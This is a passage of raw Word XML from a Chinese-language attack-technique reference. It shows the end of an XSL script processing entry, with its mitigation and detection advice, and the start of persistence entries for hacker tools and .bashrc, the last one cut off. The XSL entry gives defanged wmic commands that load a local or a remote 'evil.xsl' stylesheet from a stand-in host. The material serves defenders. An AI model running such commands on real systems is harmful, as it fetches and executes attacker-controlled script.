          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>本地文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wmic process list /FORMAT:evil[.]xsl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B75FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009B7107" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>远程文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FA103A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009B7107" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B4D4615" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解方法</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="12E1F1DC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7E865244" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="020EF537" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00ED5496" w14:paraId="7581568F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01084538" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3554139E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>msxsl.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，则阻止其执行以防止攻击者滥用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DE2A032" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28AA80" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="TableText"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用监听线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msxsl.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wmic.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。将这些工具的最近调用与先前历史</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:t>已知的正确参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:t>加载文件进行比较</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以确定异常和潜在的攻击活动（例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行参数、创建外部网络连接、加载与脚本相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。在脚本调用之前和之后使用的命令参数在确定加载的荷载来源和用途时也可能有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521F8F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="TableText"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在不是通常用于开发、调试和反向代理的系统上，</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msxsl.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他启用代理执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的存在可能是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03582CEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002A661A" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BFCE0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:sectPr w:rsidR="000F2665" w:rsidSect="00D7725A">
          <w:headerReference w:type="first" r:id="rId35"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:titlePg/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="26AA61D8" w14:textId="4E5A8AD8" w:rsidR="000F2665" w:rsidRDefault="00680B04" w:rsidP="00BA6351">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>持久化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED72F2" w14:textId="1F4192D1" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>黑客</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6575" w14:paraId="48AAEF9C" w14:textId="77777777" w:rsidTr="006A6575">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="363CE8E0" w14:textId="256A070B" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="006A6575">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="744A43C7" w14:textId="03895D7B" w:rsidR="00AB72A8" w:rsidRDefault="00AB72A8" w:rsidP="00AB72A8">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BEAB92" w14:textId="77777777" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="006A6575">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C8E3D9" w14:textId="77777777" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="006A6575">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5919AA66" w14:textId="140F33CF" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="006A6575">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控日志、进程命令参数、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EEB6AA0" w14:textId="77777777" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="006A6575"/>
    <w:p w14:paraId="29BBB426" w14:textId="26434CF0" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="006A6575">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以将黑客工具放在受害者的磁盘上，以维持持久性连接和进一步攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28667B5B" w14:textId="7E971604" w:rsidR="006A6575" w:rsidRDefault="006A6575" w:rsidP="006A6575">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="8040"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6575" w:rsidRPr="005C4554" w14:paraId="41ABAA00" w14:textId="77777777" w:rsidTr="006A6575">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="227F4B6B" w14:textId="77777777" w:rsidR="006A6575" w:rsidRPr="005C4554" w:rsidRDefault="006A6575" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="087D156D" w14:textId="77777777" w:rsidR="006A6575" w:rsidRPr="005C4554" w:rsidRDefault="006A6575" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6575" w:rsidRPr="00671A0D" w14:paraId="49C315C5" w14:textId="77777777" w:rsidTr="006A6575">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A58CB3" w14:textId="376A285E" w:rsidR="006A6575" w:rsidRPr="00671A0D" w:rsidRDefault="006A6575" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>政策执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7713B2E6" w14:textId="7E9B6806" w:rsidR="006A6575" w:rsidRPr="00671A0D" w:rsidRDefault="006A6575" w:rsidP="006A6575">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以将策略设置为拒绝无符号二进制执行，甚至拒绝不在白名单中创建进程。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71785DED" w14:textId="2AF2B221" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>bashrc</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3936F3C4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31B851B9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1156</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0723ED2B" w14:textId="25734946" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="084E3EA0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CC535D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74AFA8BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数，网络进程使用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11E92B83" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C32825E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C013AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当新</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开或用户登录时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bashrc</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户上下文中执行来正确设置其环境。对登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对交互式非登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bashrc</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
